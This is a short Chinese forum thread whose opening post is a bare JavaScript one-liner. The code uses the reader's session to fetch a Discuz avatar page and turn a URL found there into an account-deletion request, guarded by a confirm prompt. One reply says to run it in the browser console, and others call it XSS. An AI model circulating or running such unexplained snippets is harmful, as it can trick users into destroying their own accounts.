全球主机交流论坛

标题: location.href=((d=(await(await fetch("./home.php?mod=spacecp&ac.... [打印本页]

作者: 逐梦    时间: 2023-3-6 18:24
标题: location.href=((d=(await(await fetch("./home.php?mod=spacecp&ac....
  1. location.href=((d=(await(await fetch("./home.php?mod=spacecp&ac=avatar",{credentials:'include'})).text()).match(/\/\/\S+\/images\/ca\S+&ag/g)[0].replace('images/camera.swf?','?m=user&a=delete&'))&&confirm('真的要删除你的ID?'))?'':d;
复制代码

作者: HOH    时间: 2023-3-6 18:36
在F12里执行
作者: Origami    时间: 2023-3-6 18:44
笑死,隔这XSS呢
作者: 机长    时间: 2023-3-6 18:47
删除后能注册相同ID吗?
作者: youhei    时间: 2023-3-6 18:50
很早之前的玩意了




欢迎光临 全球主机交流论坛 (https://lilynana.eu.org/) Powered by Discuz! X3.4